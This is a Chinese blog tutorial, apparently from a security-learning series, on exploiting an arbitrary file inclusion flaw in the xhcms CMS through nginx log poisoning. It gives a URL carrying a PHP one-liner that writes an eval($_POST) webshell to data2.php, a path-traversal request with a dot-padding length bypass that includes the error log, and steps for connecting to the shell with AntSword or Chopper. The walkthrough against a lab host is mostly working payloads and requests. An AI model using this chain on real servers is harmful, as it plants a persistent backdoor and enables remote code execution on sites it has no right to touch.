任意文件包含漏洞(3)——实战xhcms

错误日志

nginx的默认日志文件是phpstudy/nginx/logs/error.log

apache的日志文件是phpstudy/apache/logs/error.log
一般管理员都不会改的
这里我用的是nginx
在这里插入图片描述

演示

进入网站首页
在这里插入图片描述

在url后面加上<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?>
或者其他的一句话木马

http://172.16.11.27/xhcms/%3C?php%20fputs(fopen(%27data2.php%27,%27w%27),%27%3C?php%20eval($_POST[123])?%3E%27);?%3E

在这里插入图片描述
查看日志文件

http://172.16.11.27/xhcms/?r=../../../nginx/logs/error.log...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

在这里插入图片描述
经过代码审计,这里还需要使用.,路径长度绕过

在这里插入图片描述

发现
index.php的同目录下生成了data2.php文件

在这里插入图片描述
用蚁剑或者菜刀连接该文件

http://172.16.11.27/xhcms/data2.php

在这里插入图片描述

资源下载

至少有一个任意文件包含漏洞的cms 下载链接

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 10
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值